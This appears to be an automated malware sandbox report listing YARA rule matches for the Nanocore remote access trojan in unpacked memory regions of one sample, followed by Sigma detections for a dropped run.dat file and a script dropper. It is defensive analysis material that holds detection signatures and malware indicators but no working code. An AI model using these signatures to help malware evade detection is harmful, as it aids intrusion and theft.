13.2.ZVFVY7NwZ7.exe.6040000.12.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6040000.12.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.5670000.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.5670000.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
13.2.ZVFVY7NwZ7.exe.6450000.17.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6450000.17.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6420000.16.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3deb:$x1: NanoCore.ClientPluginHost 0x3f48:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6420000.16.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3deb:$x2: NanoCore.ClientPluginHost 0x4d41:$s3: PipeExists 0x3fe1:$s4: PipeCreated 0x3e05:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6744c9f.23.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1a53c:$x1: NanoCore.ClientPluginHost 0x1a556:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6744c9f.23.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1a53c:$x2: NanoCore.ClientPluginHost 0x1d879:$s4: PipeCreated 0x1a529:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.409e360.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d3db:$x1: NanoCore.ClientPluginHost 0x1d3f5:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.409e360.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d3db:$x2: NanoCore.ClientPluginHost 0x20718:$s4: PipeCreated 0x1d3c8:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6740000.24.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d3db:$x1: NanoCore.ClientPluginHost 0x1d3f5:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6740000.24.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d3db:$x2: NanoCore.ClientPluginHost 0x20718:$s4: PipeCreated 0x1d3c8:$s5: IClientLoggingHost
0.2.ZVFVY7NwZ7.exe.40239b0.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.ZVFVY7NwZ7.exe.40239b0.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.ZVFVY7NwZ7.exe.40239b0.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.ZVFVY7NwZ7.exe.40239b0.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
13.2.ZVFVY7NwZ7.exe.5670000.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.5670000.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
13.2.ZVFVY7NwZ7.exe.6790000.26.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6790000.26.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6400000.14.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6400000.14.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.2ecdb24.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.2ecdb24.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6470000.18.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3d99:$x1: NanoCore.ClientPluginHost 0x3db3:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6470000.18.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3d99:$x2: NanoCore.ClientPluginHost 0x4dce:$s4: PipeCreated 0x3d86:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6480000.19.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6480000.19.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.408a169.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x333d2:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x333ec:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.408a169.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x333d2:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x3670f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x333bf:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.408a169.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.ZVFVY7NwZ7.exe.5420000.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.5420000.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6494629.20.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6494629.20.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6494629.20.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.ZVFVY7NwZ7.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
13.2.ZVFVY7NwZ7.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.ZVFVY7NwZ7.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.ZVFVY7NwZ7.exe.6790000.26.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x41ee:$x1: NanoCore.ClientPluginHost 0x422b:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6790000.26.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x41ee:$x2: NanoCore.ClientPluginHost 0x7641:$s4: PipeCreated 0x4218:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6420000.16.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6420000.16.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6040000.12.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6040000.12.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6490000.21.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6490000.21.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6490000.21.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.ZVFVY7NwZ7.exe.6490000.21.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6490000.21.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6490000.21.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.ZVFVY7NwZ7.exe.40239b0.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.ZVFVY7NwZ7.exe.40239b0.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.2.ZVFVY7NwZ7.exe.40239b0.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.ZVFVY7NwZ7.exe.40239b0.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.ZVFVY7NwZ7.exe.6740000.24.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6740000.24.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.4085b40.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x379fb:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x37a15:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.4085b40.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x379fb:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x3ad38:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x379e8:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.4085b40.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.ZVFVY7NwZ7.exe.6450000.17.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1deb:$x1: NanoCore.ClientPluginHost 0x1e24:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6450000.17.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1deb:$x2: NanoCore.ClientPluginHost 0x1f36:$s4: PipeCreated 0x1e05:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.4085b40.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.4085b40.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.4085b40.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.ZVFVY7NwZ7.exe.2ec18dc.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.2ec18dc.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
13.0.ZVFVY7NwZ7.exe.400000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
13.0.ZVFVY7NwZ7.exe.400000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
13.0.ZVFVY7NwZ7.exe.400000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.0.ZVFVY7NwZ7.exe.400000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.0.ZVFVY7NwZ7.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
13.0.ZVFVY7NwZ7.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
13.0.ZVFVY7NwZ7.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.0.ZVFVY7NwZ7.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.ZVFVY7NwZ7.exe.63f0000.13.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.63f0000.13.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6470000.18.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6470000.18.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.2ecdb24.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a67:$a: NanoCore 0x15ac0:$a: NanoCore 0x15af3:$a: NanoCore 0x15d1f:$a: NanoCore 0x15d9b:$a: NanoCore 0x163b4:$a: NanoCore 0x164fd:$a: NanoCore 0x169d1:$a: NanoCore 0x16cb8:$a: NanoCore 0x16ccf:$a: NanoCore 0x1c27d:$a: NanoCore 0x1c2f7:$a: NanoCore 0x22260:$a: NanoCore 0x222aa:$a: NanoCore 0x22f04:$a: NanoCore 0x2bcdb:$a: NanoCore 0x2bdc5:$a: NanoCore 0x2cc3c:$a: NanoCore
13.2.ZVFVY7NwZ7.exe.2ebcaa0.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x99d2:$a: NanoCore 0x99f7:$a: NanoCore 0x9a50:$a: NanoCore 0x19c03:$a: NanoCore 0x19c29:$a: NanoCore 0x19c85:$a: NanoCore 0x26aeb:$a: NanoCore 0x26b44:$a: NanoCore 0x26b77:$a: NanoCore 0x26da3:$a: NanoCore 0x26e1f:$a: NanoCore 0x27438:$a: NanoCore 0x27581:$a: NanoCore 0x27a55:$a: NanoCore 0x27d3c:$a: NanoCore 0x27d53:$a: NanoCore 0x2d301:$a: NanoCore
0.2.ZVFVY7NwZ7.exe.3eff6b0.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13448d:$x1: NanoCore.ClientPluginHost 0x1344ca:$x2: IClientNetworkHost 0x137ffd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.ZVFVY7NwZ7.exe.3eff6b0.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.ZVFVY7NwZ7.exe.3eff6b0.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1341f5:$a: NanoCore 0x134205:$a: NanoCore 0x134439:$a: NanoCore 0x13444d:$a: NanoCore 0x13448d:$a: NanoCore 0x134254:$b: ClientPlugin 0x134456:$b: ClientPlugin 0x134496:$b: ClientPlugin 0x13437b:$c: ProjectData 0x134d82:$d: DESCrypto 0x13c74e:$e: KeepAlive 0x13a73c:$g: LogClientMessage 0x136937:$i: get_Connected 0x1350b8:$j: #=q 0x1350e8:$j: #=q 0x135104:$j: #=q 0x135134:$j: #=q 0x135150:$j: #=q 0x13516c:$j: #=q 0x13519c:$j: #=q 0x1351b8:$j: #=q
0.2.ZVFVY7NwZ7.exe.2edc690.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.ZVFVY7NwZ7.exe.2edc690.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q 0x10efc:$j: #=q 0x10f18:$j: #=q
0.2.ZVFVY7NwZ7.exe.40c39d0.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.ZVFVY7NwZ7.exe.40c39d0.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.ZVFVY7NwZ7.exe.40c39d0.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.ZVFVY7NwZ7.exe.2ec18dc.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14dc7:$a: NanoCore 0x14ded:$a: NanoCore 0x14e49:$a: NanoCore 0x21caf:$a: NanoCore 0x21d08:$a: NanoCore 0x21d3b:$a: NanoCore 0x21f67:$a: NanoCore 0x21fe3:$a: NanoCore 0x225fc:$a: NanoCore 0x22745:$a: NanoCore 0x22c19:$a: NanoCore 0x22f00:$a: NanoCore 0x22f17:$a: NanoCore 0x284c5:$a: NanoCore 0x2853f:$a: NanoCore 0x2e4a8:$a: NanoCore 0x2e4f2:$a: NanoCore 0x2f14c:$a: NanoCore
Click to see the 105 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe, ProcessId: 5612, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

System Summary:

Sigma detected: WScript or CScript Dropper

Show sources

Source: Process started

